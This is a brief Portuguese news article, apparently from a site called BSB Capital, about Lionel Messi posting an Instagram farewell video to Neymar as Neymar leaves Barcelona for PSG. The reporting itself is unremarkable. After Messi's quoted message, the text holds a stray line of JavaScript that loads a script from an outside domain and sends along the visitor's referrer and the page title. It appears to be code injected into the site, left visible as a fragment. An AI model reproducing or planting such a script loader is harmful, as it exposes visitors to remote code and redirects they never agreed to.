Messi posta vídeo emocionante em despedida a Neymar: “Foi um prazer”

BSB Capital 02/08/2017 às 11:17, Atualizado em 18/09/2017 às 20:58

Primeiro jogador a se pronunciar oficialmente foi justamente Lionel Messi, ídolo de infância de Neymar, e um dos companheiros mais próximos do brasileiro no elenco

Esta quarta-feira (02) ficará marcada como a última vez que Neymar foi à Cidade Esportiva Joan Gamper como jogador do Barcelona. Ao menos nessa passagem pelo clube. Após se reunir com a diretoria catalã e comunicar seu desejo de ser negociado com o Paris Saint-Germain, o craque se despediu do elenco, e ficará sem treinar até que sua situação com os franceses se resolva.

O primeiro jogador a se pronunciar oficialmente foi justamente Lionel Messi, ídolo de infância de Neymar, e um dos companheiros mais próximos do brasileiro no elenco. Com um vídeo postado no Instagram, argentino se despediu do camisa 11.

“Foi um grande prazer ter compartilhado todos esses anos com você amigo @neymarjr. Desejo-lhe sorte nesta nova etapa da sua vida. Nos vemos”

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima